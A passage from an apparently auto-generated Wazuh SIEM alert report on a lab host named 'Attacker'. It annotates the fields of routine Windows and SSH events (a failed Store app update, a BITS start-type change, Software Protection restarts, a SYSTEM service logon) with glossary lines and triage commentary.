Which event log the record came from (Application here; also System, Security, or a Microsoft-Windows-*/Operational log).

data.win.system.computer:  Attacker
Host that recorded the event; should agree with agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:44Z. Reason: RulesEngine."
Rendered message. Routine licensing housekeeping: SPP scheduled its own restart about 24 hours ahead. Not a security event on its own; the Medium label comes from the generic behaviour score, not from this message. A rule-level 3 Application event with no MITRE mapping scoring 7 is a sign the scorer needs tuning.

data.win.eventdata.data:  2025-04-25T22:31:44Z, RulesEngine
Unnamed parameters of a classic event, in the order they appear in the message; parse them positionally.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:06.554+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:06.554+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
GPG 13 (UK Good Practice Guide 13, protective monitoring) control mapping, like the PCI and NIST tags.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534826.2399401
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-WindowsUpdateClient
ETW provider: the Windows Update client, which also installs Microsoft Store app updates.

data.win.system.providerGuid:  {945a8954-c147-4acd-923f-40c45405a658}
Provider GUID; stable across hosts and display languages, so filter on this rather than on the name.

data.win.system.eventID:  20
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
Event template version.

data.win.system.level:  2
Windows event level: 2 = Error, which is why rule 61102 ("Windows System error event") fired; 3 = Warning, 4 = Information.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  13
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000028
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:45:51.3230557Z
When Windows wrote the event (UTC), about 75 s before the manager's timestamp; the same agent lag as the other Windows events in this report.

data.win.system.eventRecordID:  3030
Incremental log record number – handy for timeline order.

data.win.system.processID:  9648
PID of the process that logged the event (the update client's service host).

data.win.system.threadID:  5444
Thread within that process; only useful when matching against ETW traces.

data.win.system.channel:  System
Which event log the record came from (System here).

data.win.system.computer:  Attacker
Host that recorded the event; should agree with agent.name.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NMPJ99VJBWV-Microsoft.YourPhone."
Rendered message. A failed Microsoft Store app update is not a security signal by itself. What matters is the pattern: rule 61102 aggregates every System-log error (4 hits here), so check whether any of them are failed OS security updates, which would leave the host unpatched.

data.win.eventdata.errorCode:  0x80073d02
HRESULT of the failure. The 0x8007 prefix means it wraps a Win32 error code, here 0x3D02 (15618), from the package installer; look that code up before treating this as anything other than an install problem.

data.win.eventdata.updateTitle:  9NMPJ99VJBWV-Microsoft.YourPhone
What was being installed. The 9N... prefix is a Microsoft Store product ID, so this is the Your Phone / Phone Link app, not an OS patch.

data.win.eventdata.updateGuid:  {2eb475fe-568c-40c0-97c7-1b48d934a305}
Windows Update's ID for this update; pair with updateRevisionNumber to match the Update History on the host.

data.win.eventdata.updateRevisionNumber:  1
Revision of that update ID.

data.win.eventdata.serviceGuid:  {855e8a7c-ecb4-4ca3-b045-1dfa50104289}
Which update service supplied the package; Windows Update, Microsoft Update, WSUS and the Store each have a fixed service GUID.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:47:23.520+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:23.520+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Free-text note from the rule author; here a compatibility remark, not an indicator.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534843.2401275
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
Provider: the Service Control Manager (services.exe), which logs service start-type changes, starts, stops and crashes.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
Provider GUID; stable across hosts and display languages, so filter on this rather than on the name.

data.win.system.eventSourceName:  Service Control Manager
Legacy event-source name for classic events; the same component as providerName.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
Event template version; 0 for classic events like this one.

data.win.system.level:  4
Windows event level: 4 = Information. A start-type change is logged as informational whichever service changed, so the level says nothing about importance.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:46:11.7493654Z
When Windows wrote the event (UTC), about 72 s before the manager's timestamp; order by this, not by timestamp.

data.win.system.eventRecordID:  3035
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
PID of the logging process: services.exe. The same PID (0x304) is the requesting process in the 4624 service logon above, which ties that logon to the Service Control Manager.

data.win.system.threadID:  7040
Logging thread ID; that it equals the event ID is coincidence.

data.win.system.channel:  System
Which event log the record came from (System here).

data.win.system.computer:  Attacker
Host that recorded the event; should agree with agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
Rendered message. BITS flipping between auto start and demand start is logged routinely on Windows 10/11 with no operator involved, so this one event is noise. Keep the rule, though: event 7040 is also how you see a security service (Defender, Windows Event Log, the Wazuh agent) set to disabled. With 11 hits in this window, list them all and look at param4 and param3 for any service other than BITS and for any change to disabled.

data.win.eventdata.param1:  Background Intelligent Transfer Service
Display name of the service that changed.

data.win.eventdata.param2:  auto start
Previous start type.

data.win.eventdata.param3:  demand start
New start type. The values to care about are "disabled" and, for services that should stay off, "auto start".

data.win.eventdata.param4:  BITS
Short (registry) name of the service; match on this one, since display names are localised.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:24.740+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:24.740+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534844.2403086
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:47:24.340053+00:00 server1 sshd[3469]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:47:24.340053+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is back to normal load.

🧠 What happened? Agent event queue is back to normal load.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:32.293+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:32.293+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is back to normal load.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  205
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534852.2403479
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'normal'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  normal
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:34.057+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:34.057+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534974.2403694
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:47:09.2829375Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2423
Incremental log record number – handy for timeline order.

data.win.system.processID:  9456
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:09Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:09Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:43.422+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:43.422+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534983.2405274
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:47:59.3887351Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43974
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:44.991+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:44.991+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534984.2412611
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:48:07.3897224Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2425
Incremental log record number – handy for timeline order.

data.win.system.processID:  14384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:07Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:45.261+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:45.261+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

